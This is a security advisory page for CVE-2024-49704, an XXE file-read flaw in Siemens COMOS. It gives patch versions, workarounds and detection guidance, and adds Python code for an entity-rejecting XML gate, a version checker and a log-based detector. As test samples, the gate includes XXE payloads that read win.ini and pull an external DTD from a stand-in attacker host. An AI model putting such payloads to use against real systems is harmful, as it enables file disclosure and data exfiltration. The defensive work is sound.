CVE-2024-49704
📋 TL;DR
This XXE (XML external entity) vulnerability in Siemens COMOS lets an attacker read arbitrary files from an affected system by tricking a user into opening a malicious configuration or mapping file. It affects multiple COMOS versions across the V10.3 and V10.4 branches. Users who process untrusted configuration or mapping files are at risk.
💻 Affected Systems
- Siemens COMOS
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete file system disclosure including sensitive configuration files, credentials, and system files accessible to the COMOS process.
Likely Case
Extraction of known files from the local system or accessible network shares, potentially exposing sensitive engineering data or system information.
If Mitigated
Limited impact if file access is restricted through proper permissions and users only process trusted files.
🎯 Exploit Status
Requires social engineering to get a user to open a malicious file. The attacker needs to know the paths of the files to be extracted, and can only read what the COMOS process itself is permitted to read.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: V10.3.3.5.8, V10.4.3.0.47, V10.4.4.2, V10.4.4.1.21 or later
Vendor Advisory: https://cert-portal.siemens.com/productcert/html/ssa-701627.html
Restart Required: Yes
Instructions:
1. Download the appropriate patch from the Siemens support portal.
2. Back up the COMOS installation.
3. Run the installer with administrative privileges.
4. Restart the affected COMOS services and applications.
🔧 Temporary Workarounds
Restrict XML parsing
Configure XML parsers to disable external entity resolution (DOCTYPE/ENTITY declarations and external DTDs).
File processing restrictions
Only process configuration/mapping files from trusted sources.
🧯 If You Can't Patch
- Implement strict file access controls to limit what files COMOS process can read
- Train users to only open configuration files from trusted sources and verify file integrity
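The two workarounds above (disable external entity resolution; only accept configuration or mapping files from trusted sources) can be combined into a pre-processing gate that inspects an untrusted file for the constructs an XXE payload needs before the real application parses it. The following is an added example, not COMOS code and not from the Siemens advisory; it uses Python's expat bindings to record external (SYSTEM/PUBLIC) entities, parameter entities and external DTD references without ever fetching them, and rejects any file that declares one. The sample mapping files are constructed for the example; the element names, the `file:///C:/Windows/win.ini` target and the `attacker.example` host are assumptions.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET


class UnsafeXmlError(ValueError):
    """Raised when a configuration/mapping file contains XXE building blocks."""


def find_entity_risks(xml_bytes: bytes) -> list:
    """Return findings for the constructs an XXE payload relies on: external
    (SYSTEM/PUBLIC) entities, parameter entities and external DTD subsets.
    Nothing is fetched: external references are recorded and skipped."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            findings.append(f"external DTD for <!DOCTYPE {doctype_name}>: {public_id or system_id}")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id or public_id:
            kind = "parameter" if is_param else "general"
            findings.append(f"external {kind} entity '{name}' -> {public_id or system_id}")
        elif is_param:
            findings.append(f"internal parameter entity '%{name};'")

    def on_external_ref(context, base, system_id, public_id):
        findings.append(f"external entity referenced in content: {public_id or system_id}")
        return 1  # report success to expat but never open the target

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as exc:
        # A malformed file is rejected as well; the findings gathered so far are kept.
        findings.append(f"not well-formed XML: {exc}")
    return findings


def is_safe_mapping_file(xml_bytes: bytes) -> bool:
    return not find_entity_risks(xml_bytes)


def load_mapping_file(xml_bytes: bytes) -> ET.Element:
    """Gate an untrusted mapping file, then parse it with the normal parser."""
    risks = find_entity_risks(xml_bytes)
    if risks:
        raise UnsafeXmlError("; ".join(risks))
    return ET.fromstring(xml_bytes)


# Constructed sample inputs (hypothetical mapping-file layout, not COMOS's format).
BENIGN = b"""<?xml version="1.0"?>
<mapping><field src="Tag" dst="Name"/></mapping>"""

XXE_FILE_READ = b"""<?xml version="1.0"?>
<!DOCTYPE mapping [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<mapping><field src="Tag" dst="Name">&xxe;</field></mapping>"""

XXE_OUT_OF_BAND = b"""<?xml version="1.0"?>
<!DOCTYPE mapping [
  <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">
  %ext;
]>
<mapping/>"""


if __name__ == "__main__":
    for label, doc in ("benign", BENIGN), ("file read", XXE_FILE_READ), ("out-of-band", XXE_OUT_OF_BAND):
        print(label, "->", find_entity_risks(doc) or "no entity risks")
```

The gate is deliberately stricter than "don't resolve entities": a legitimate mapping file has no reason to declare external or parameter entities at all, so their mere presence is treated as evidence of tampering and the file is never handed to the application parser.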
🔍 How to Verify
Check if Vulnerable:
Check COMOS version against affected versions list. Review if Generic Data Mapper, Engineering Adapter, or Engineering Interface components are in use.
Check Version:
Check Help → About in COMOS application or review installation directory version files
Verify Fix Applied:
Verify installed version is equal to or greater than patched versions: V10.3.3.5.8, V10.4.3.0.47, V10.4.4.2, or V10.4.4.1.21
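Comparing a multi-component COMOS version string against four fix versions spread over three maintenance branches is easy to get wrong (V10.4.4.1.20 is not fixed, V10.4.4.2 is, and V10.4.2.x is not covered by any listed fix). The following is an added example, not a Siemens tool; it uses the fix versions from this page and assumes that a maintenance branch is identified by the first three version components, so a version is reported as fixed only when it is at or above the lowest fix version of its own branch, and as unknown when its branch has no listed fix.

```python
import re

# Fixed versions as listed in this page's Official Fix section.
FIXED_VERSIONS = ("V10.3.3.5.8", "V10.4.3.0.47", "V10.4.4.2", "V10.4.4.1.21")

VERSION_RE = re.compile(r"V?\d+(?:\.\d+){2,}")


def parse_version(text: str) -> tuple:
    """'V10.4.3.0.47' -> (10, 4, 3, 0, 47); an optional leading V is accepted."""
    s = text.strip()
    if s[:1] in ("V", "v"):
        s = s[1:]
    if not re.fullmatch(r"\d+(?:\.\d+)+", s):
        raise ValueError(f"not a COMOS-style version: {text!r}")
    return tuple(int(part) for part in s.split("."))


def extract_version(text: str):
    """Pull the first version-looking token out of free text such as an
    About dialog caption or a version file; None when nothing matches."""
    m = VERSION_RE.search(text)
    return m.group(0) if m else None


def branch(version: tuple) -> tuple:
    # Assumption: a maintenance branch is identified by the first three components
    # (10.3.3, 10.4.3, 10.4.4), matching how the fixes above are grouped.
    return version[:3]


def fix_status(installed: str) -> str:
    """Return 'fixed', 'vulnerable' or 'unknown' for an installed version string."""
    v = parse_version(installed)
    branch_fixes = [parse_version(f) for f in FIXED_VERSIONS
                    if branch(parse_version(f)) == branch(v)]
    if not branch_fixes:
        return "unknown"  # no fix listed for this branch: check the advisory
    # Tuple comparison is component-wise, and a shorter prefix sorts lower,
    # so (10, 4, 4, 2) >= (10, 4, 4, 1, 21) and (10, 4, 4, 1) < (10, 4, 4, 1, 21).
    return "fixed" if v >= min(branch_fixes) else "vulnerable"


if __name__ == "__main__":
    for sample in ("V10.3.3.5.7", "V10.3.3.5.8", "V10.4.4.1.20", "10.4.4.2", "V10.4.2.0.1"):
        print(sample, "->", fix_status(sample))
```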
📡 Detection & Monitoring
Log Indicators:
- Unusual file access patterns from COMOS processes
- Failed attempts to access system files
Network Indicators:
- Outbound HTTP, FTP or SMB connections from the COMOS process to unexpected hosts while a configuration or mapping file is being loaded (an XXE payload can point an external entity or DTD at an attacker-controlled URL to exfiltrate file contents out of band)
SIEM Query:
Process: COMOS.exe AND (FileAccess: *\Windows\System32\* OR FileAccess: *.config OR FileAccess: \\*)
(pseudo-syntax; translate to your SIEM's query language and baseline against the COMOS installation and project directories first, otherwise the *.config clause will match the application's own configuration files)
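The log and SIEM indicators above amount to one rule: the COMOS process reading files outside its own installation and project directories, reading from network shares, or being denied access to a sensitive path. The following is an added example, not a vendor-supplied rule; it runs that logic over a handful of constructed file-access events (a simplified CSV layout, not a real Windows or COMOS log format) and adds a simple burst check so that several such reads by one user inside a short window can be escalated. The process name COMOS.exe is taken from the page's query, and the allowed roots, hostnames, users and paths are assumptions.

```python
import csv
import io
from collections import namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts host process user path access result")

# Constructed sample events: timestamp, host, process, user, path, access, result.
SAMPLE_LOG = r"""
2024-12-10T09:12:01Z,ENG-WS01,COMOS.exe,CORP\eng01,C:\COMOS\Projects\Plant1\mapping.xml,READ,SUCCESS
2024-12-10T09:12:02Z,ENG-WS01,COMOS.exe,CORP\eng01,C:\Windows\win.ini,READ,SUCCESS
2024-12-10T09:12:02Z,ENG-WS01,COMOS.exe,CORP\eng01,C:\Windows\System32\drivers\etc\hosts,READ,SUCCESS
2024-12-10T09:12:03Z,ENG-WS01,COMOS.exe,CORP\eng01,C:\Windows\System32\config\SAM,READ,DENIED
2024-12-10T09:12:04Z,ENG-WS01,COMOS.exe,CORP\eng01,\\fileserver\finance\budget.xlsx,READ,SUCCESS
2024-12-10T09:12:05Z,ENG-WS01,explorer.exe,CORP\eng01,C:\Windows\win.ini,READ,SUCCESS
2024-12-10T09:12:06Z,ENG-WS01,COMOS.exe,CORP\eng01,C:\Program Files\Siemens\COMOS\config\app.config,READ,SUCCESS
"""

# Assumed legitimate roots for the COMOS process on this workstation.
ALLOWED_ROOTS = (r"C:\COMOS\Projects", r"C:\Program Files\Siemens\COMOS")
OS_DIRS = (r"C:\Windows",)


def _norm(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").lower()


def _under(path: str, root: str) -> bool:
    p, r = _norm(path), _norm(root)
    return p == r or p.startswith(r + "\\")


def parse_events(text: str) -> list:
    return [Event(*row) for row in csv.reader(io.StringIO(text.strip())) if row]


def suspicious_reads(events, process="COMOS.exe", allowed_roots=ALLOWED_ROOTS) -> list:
    """Return (timestamp, user, path, reasons) for file accesses by `process`
    that fall outside the allowed roots, touch OS directories or network
    shares, or were denied (a failed attempt is itself an indicator)."""
    alerts = []
    for e in events:
        if e.process.lower() != process.lower():
            continue
        reasons = []
        if not any(_under(e.path, r) for r in allowed_roots):
            reasons.append("outside allowed roots")
        if _norm(e.path).startswith("\\\\"):
            reasons.append("network share")
        if any(_under(e.path, d) for d in OS_DIRS):
            reasons.append("OS directory")
        if e.result.upper() == "DENIED":
            reasons.append("access denied")
        if reasons:
            alerts.append((e.ts, e.user, e.path, ", ".join(reasons)))
    return alerts


def burst(alerts, window_seconds=60, threshold=3) -> bool:
    """True when at least `threshold` alerts for one user fall inside `window_seconds`."""
    by_user = {}
    for ts, user, _path, _why in alerts:
        stamp = datetime.fromisoformat(ts.replace("Z", "+00:00"))
        by_user.setdefault(user, []).append(stamp)
    for stamps in by_user.values():
        stamps.sort()
        for i in range(len(stamps) - threshold + 1):
            if stamps[i + threshold - 1] - stamps[i] <= timedelta(seconds=window_seconds):
                return True
    return False


if __name__ == "__main__":
    found = suspicious_reads(parse_events(SAMPLE_LOG))
    for alert in found:
        print(alert)
    print("burst:", burst(found))
```

Tuning the allowed roots to the real installation and project locations is what keeps this rule quiet; the one explorer.exe read of win.ini and the COMOS read of its own app.config are ignored, while the four reads that match the XXE pattern (two OS files, one denied registry hive, one network share) are reported within a three-second window.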